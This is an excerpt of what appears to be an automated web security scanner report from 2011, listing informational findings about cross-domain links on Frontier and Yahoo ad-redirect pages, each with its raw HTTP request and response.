<iframe style="padding:0px;margin:0px;" src="http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313295.265601?click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bTE4bmprbyhnaWQkdlliWG9VUERrampwQVJwalRsLndqUUtGTWhkN2FrNW1GbzhBQXI5XyxzdCQxMzE1MzEzMjk1MjE0ODE1LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJDlyWkZPVVBEbjJvLSxjdCQyNSx5YngkXzBYYWFWLmFEYTZmYW8zQjc4UDA1USxyJDAscmQkMTZpMGlmODNnKSk/1/*http://global.ard.yahoo.com/SIG=15h333g9c/M=999999.999999.999999.999999/D=fin/S=95993639:LREC/Y=YAHOO/EXP=1315320495/L=vYbXoUPDkjjpARpjTl.wjQKFMhd7ak5mFo8AAr9_/B=9rZFOUPDn2o-/J=1315313295265601/K=kYjDTKuicqWfKJal7_1uqQ/A=3861873750735285092/R=0/X=6/*" title="" border="0" frameBorder="0" scrolling="no" width="300" height="250"></iframe>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128pp4qhv(gid$vYbXoUPDkjjpARpjTl.wjQKFMhd7ak5mFo8AAr9_,st$1315313295214815,v$1.0))&t=J_3-D_3&al=(as$12c1a0iu0,aid$9rZFOUPDn2o-,bi$933208051,ct$25,at$H)"></noscript>
...[SNIP]...
<p>Fundamental company data provided by <a href="http://www.capitaliq.com">Capital IQ</a>. Historical chart data and daily updates provided by <a href="http://www.csidata.com">Commodity Systems, Inc. (CSI)</a>. International historical chart data, daily updates, fund summary, fund performance, dividend data and Morningstar Index data provided by <a href="http://www.morningstar.com/">Morningstar, Inc.</a> Real-Time quotes provided by <a href="http://batstrading.com">BATS Exchange</a>. Financials data provided by <a href="http://www.edgar-online.com/">Edgar Online</a>. International historical chart data, daily updates, fundAnalyst estimates data provided by <a href="http://thomsonreuters.com/">Thomson Financial Network</a>
...[SNIP]...
</div>
<link type="text/css" rel="stylesheet" href="http://l.yimg.com/bm/combo?fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yfi_symbol_suggest.css&amp;fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yui_helper.css"><div id="spaceid" style="display:none;">
...[SNIP]...
</script><script type="text/javascript" src="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/yuiloader-dom-event/2.0.0/mini/yuiloader-dom-event.js&amp;fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/container/2.0.0/mini/container.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/ylc_1.9.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_loader.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_symbol_suggest.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_init_symbol_suggest.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_nav_topnav_init.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_nav_topnav.js"></script>
...[SNIP]...
<input type="hidden" id=".yficrumb" name=".yficrumb" value=""><script type="text/javascript" src="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfs_concat.js&amp;fi/common/p/d/static/js/2.0.188908/translations/2.0.0/mini/yfs_l10n_en-US.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/cookie/2.0.0/mini/cookie-min.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_ticker_concat.js"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128pp4qhv(gid$vYbXoUPDkjjpARpjTl.wjQKFMhd7ak5mFo8AAr9_,st$1315313295214815,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.61. http://frontier.com/winwin1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /winwin1

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51858


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
</title><link rel="icon" href="http://images.frontiernet.net/favicon.ico" type="image/ico" /><link rel="shortcut icon" href="http://images.frontiernet.net/favicon.ico" />

<!-- Agent Ordering Begin -->
...[SNIP]...
<li><a href="http://frontier.my.yahoo.com/">Frontier My Yahoo!</a>
...[SNIP]...
<div id="offer-service1" class="offer-service"><a href="http://www.fbscenter.com/Content/BusinessHighSpeedInternet.pdf" target="_blank"><img alt="High-Speed Internet" src="/Images/2011promo/icon-red-internet.jpg" width="234" height="134" />
...[SNIP]...
<div id="offer-service2" class="offer-service"><a href="http://www.fbscenter.com/Content/BusinessVoiceSolutions.pdf" target="_blank"><img alt="Voice" src="/Images/2011promo/icon-red-voice.jpg" width="234" height="134" />
...[SNIP]...
<div id="offer-service3" class="offer-service"><a href="http://www.fbscenter.com/Content/PeaceOfMind.pdf" target="_blank"><img alt="Back Up &amp; Recovery" src="/Images/2011promo/icon-red-backup-recovery.jpg" width="234" height="134" />
...[SNIP]...
<br /><a href="http://www.facebook.com/FrontierCorp" target="_blank"><img alt="Facebook" src="/Images/2011promo/logo-facebook.gif" width="29" height="28" /></a> <a href="http://twitter.com/frontiercorp" target="_blank"><img alt="Twitter" src="/Images/2011promo/logo-twitter.gif" width="29" height="28" /></a> <a href="http://www.linkedin.com/company/frontier-communications" target="_blank"><img alt="LinkdIn" src="/Images/2011promo/logo-linkedin.gif" width="29" height="28" />
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ftr.www.frontier.com/generic.footer;tile=1;sz=728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/ftr.www.frontier.com/generic.footer;tile=1;sz=728x90;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...
<li><a class="CheckForRegion" href="http://www.frontierhelp.com/techsupport">Technical
Support</a>
...[SNIP]...
<li><a class="CheckForRegion" href="https://frontier.globysonline.com/cv/scripts/ABE0/eng/log.asp?gru=437662910&amp;sec=">
Business Online Bill Pay</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=66508&amp;p=irol-irhome">Investor
Relations</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=66508&amp;p=irol-news&amp;nyo=0">
Press Room</a>
...[SNIP]...
<li><a href="http://carrier.frontiercorp.com/crtf/tariffs/index.cfm?fuseaction=main&amp;sctnID=19">
Tariffs</a>
...[SNIP]...
<noscript><img src="http://citizenstelecom.112.2o7.net/b/ss/cznfrontier/1/H.22.1--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...

15.62. http://games.frontier.com/game.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.frontier.com
Path:   /game.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /game.htm?code=119282623&lc=en&channel=110464377 HTTP/1.1
Host: games.frontier.com
Proxy-Connection: keep-alive
Referer: http://games.frontier.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=oberonfrontier%3D%2526pid%253DhomePage%2526pidt%253D1%2526oid%253Dhttp%25253A//games.frontier.com/game.htm%25253Fcode%25253D119282623%252526lc%25253Den%252526channel%25253D110464377%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 91941
Cache-Control: private, max-age=0
Expires: Tue, 06 Sep 2011 12:50:48 GMT
Date: Tue, 06 Sep 2011 12:50:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ober.frontier/product_' + pcode +';dc_seed=' + adid +';tile=2;sz=300x250;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ober.frontier/product_' + pcode +';dc_seed=' + adid +';tile=2;sz=300x250;ord=123456789?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ober.frontier/product_' + pcode +';dc_seed=' + adid +';tile=3;sz=300x250;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ober.frontier/product_' + pcode +';dc_seed=' + adid +';tile=3;sz=300x250;ord=123456789?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ober.frontier/product_' + pcode +';sz=300x160;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ober.frontier/product_' + pcode +';sz=300x160;ord=123456789?" width="300" height="160" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ober.frontier/product_' + pcode +';dc_seed=' + adid +';tile=4;sz=728x90;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ober.frontier/product_' + pcode +';dc_seed=' + adid +';tile=4;sz=728x90;ord=123456789?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
<li><a href="http://frontier.my.yahoo.com/">Frontier My Yahoo!</a>
...[SNIP]...
<li><a href="http://www.frontierhelp.com/frontiercare/">Peace of Mind</a>
...[SNIP]...
</noscript> <a href="http://phx.corporate-ir.net/phoenix.zhtml?c=66508&p=irol-irhome"><b>
...[SNIP]...

15.63. http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://global.ard.yahoo.com
Path:   /SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F HTTP/1.1
Host: global.ard.yahoo.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1542.0.iframe.120x60/0.22285940730944276?yhdata=ycg=&yyob=&zip=,&ybt=&click=http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:48:38 GMT
Cache-Control: private, max-age=0, no-cache
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F
Connection: close
Content-Type: text/html; charset=utf-8

The document has moved <A HREF="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F">here</A>
...[SNIP]...

15.64. http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://global.ard.yahoo.com
Path:   /SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp?q=H4sIAAAAAAAAAFWQPW7DMAyFr0JStH5SrYW2GFmLxOgJisqJEI-GI6dKEEl37ImqBl26cHh8JL733uPrd6pnO80-xLq4y2RBa3ajRZdG-waEIJG5AzZm7z58SE1kUqiZ9u4aazN6S8huPlkgAKOQBClWLvtztAIBBtQDqgHxOcmF8dfJBCS07Ixyaf0vDMqQFNLIYR4JkIb08O7TjilE-5XqXJfYT_OtlH4pj4PzpW1SqRYEsG4ADAeXU43tr0DJkpvScMJkd-UY8lzXvyRKSySibu_8tV1rg10nEdA0yIaELDsAxme8Jdgl393pmO0tBP-y3c5rv5bTJcclp-Xe1xi2zbERRAY6oWDDsnVnNG7uP6lyLdNoAQAA HTTP/1.1
Host: global.ard.yahoo.com
Proxy-Connection: keep-alive
Referer: http://adserver.teracent.net/tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_798137&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=826091&rcu=http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:48:31 GMT
Cache-Control: private, max-age=0, no-cache
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp?q=H4sIAAAAAAAAAFWQPW7DMAyFr0JStH5SrYW2GFmLxOgJisqJEI-GI6dKEEl37ImqBl26cHh8JL733uPrd6pnO80-xLq4y2RBa3ajRZdG-waEIJG5AzZm7z58SE1kUqiZ9u4aazN6S8huPlkgAKOQBClWLvtztAIBBtQDqgHxOcmF8dfJBCS07Ixyaf0vDMqQFNLIYR4JkIb08O7TjilE-5XqXJfYT_OtlH4pj4PzpW1SqRYEsG4ADAeXU43tr0DJkpvScMJkd-UY8lzXvyRKSySibu_8tV1rg10nEdA0yIaELDsAxme8Jdgl393pmO0tBP-y3c5rv5bTJcclp-Xe1xi2zbERRAY6oWDDsnVnNG7uP6lyLdNoAQAA
Connection: close
Content-Type: text/html; charset=utf-8

The document has moved <A HREF="http://adserver.teracent.net/tase/redir/1315313297486_68372787_as3103_imp?q=H4sIAAAAAAAAAFWQPW7DMAyFr0JStH5SrYW2GFmLxOgJisqJEI-GI6dKEEl37ImqBl26cHh8JL733uPrd6pnO80-xLq4y2RBa3ajRZdG-waEIJG5AzZm7z58SE1kUqiZ9u4aazN6S8huPlkgAKOQBClWLvtztAIBBtQDqgHxOcmF8dfJBCS07Ixyaf0vDMqQFNLIYR4JkIb08O7TjilE-5XqXJfYT_OtlH4pj4PzpW1SqRYEsG4ADAeXU43tr0DJkpvScMJkd-UY8lzXvyRKSySibu_8tV1rg10nEdA0yIaELDsAxme8Jdgl393pmO0tBP-y3c5rv5bTJcclp-Xe1xi2zbERRAY6oWDDsnVnNG7uP6lyLdNoAQAA">here</A>
...[SNIP]...

15.65. http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*http://ad.doubleclick.net/click  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://global.ard.yahoo.com
Path:   /SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*http://ad.doubleclick.net/click

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*http://ad.doubleclick.net/click;h=v2%7C3D5D%7C0%7C0%7C%2a%7Ct;234260563;0-0;0;58130593;31-1%7C1;39902686%7C39920473%7C1;;;pc=WSOD%3fhttp://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/68.103.iframe.120x60/yud*smpv=3%7Ced=Kfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F HTTP/1.1
Host: global.ard.yahoo.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295039208?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sm6vod4/M=601843023.602979803.858295551.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sWXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:48:35 GMT
Cache-Control: private, max-age=0, no-cache
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://ad.doubleclick.net/click;h=v2%7C3D5D%7C0%7C0%7C%2a%7Ct;234260563;0-0;0;58130593;31-1%7C1;39902686%7C39920473%7C1;;;pc=WSOD%3fhttp://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/68.103.iframe.120x60/yud*smpv=3%7Ced=Kfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F
Connection: close
Content-Type: text/html; charset=utf-8

The document has moved <A HREF="http://ad.doubleclick.net/click;h=v2%7C3D5D%7C0%7C0%7C%2a%7Ct;234260563;0-0;0;58130593;31-1%7C1;39902686%7C39920473%7C1;;;pc=WSOD%3fhttp://ad.wsod.com/click/457d7d7cd3cd82d66ba00fc48f756260/68.103.iframe.120x60/yud*smpv=3%7Ced=Kfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG**;10.3183;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2Fq;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--_@3Fs=XSS.F">here</A>
...[SNIP]...

15.66. http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*http://adclick.g.doubleclick.net/aclk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://global.ard.yahoo.com
Path:   /SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*http://adclick.g.doubleclick.net/aclk

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*http://adclick.g.doubleclick.net/aclk?sa=L&ai=BaZK2kBZmTqqeLY2YjQSIjaSeBwAAAAAQASAAOABQ--WT1wVYq9PzFGDJ1vqGyKOgGYIBCWNhLWdvb2dsZbIBEWZpbmFuY2UueWFob28uY29tyAEJ2gGWAWh0dHA6Ly9maW5hbmNlLnlhaG9vLmNvbS9xO195bHQ9QXNqcWtvVkltWGNnY3JXQUVhQzdPTGJ4VmF4XztfeWx1PVgzb0RNVEZoWnpkcE5XUmpCSEJ2Y3dNeE1nUnpaV01EZVdacFUzbHRZbTlzVEc5dmEzVndVbVZ6ZFd4MGN3UnpiR3NEZUhOelpnLS0_cz1YU1MuRsACAqgDAdgEgK3iBOAEApoFGAj4ozYQ8eSyHxiVj-hwIKvT8xQokeucAaAGHw&num=0&sig=AOD64_0VY0xIBePsVX8cVgiDrhGM37PyFQ&client=&adurl=http://pixel.everesttech.net/2565/c%3Fev_ct%3Dd%26ev_sid%3D54%26ev_ci%3D1660002714%26ev_ai%3D1660082513%26ev_cri%3D1660643811%26url%3Dhttp%253A//landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/%253Futm_source%253Dyhofin%2526utm_medium%253Dpaid-banner-ads%2526utm_campaign%253D120x60-QuotesBttn%2526utm_content%253Dstock%253AoldGrnBlk 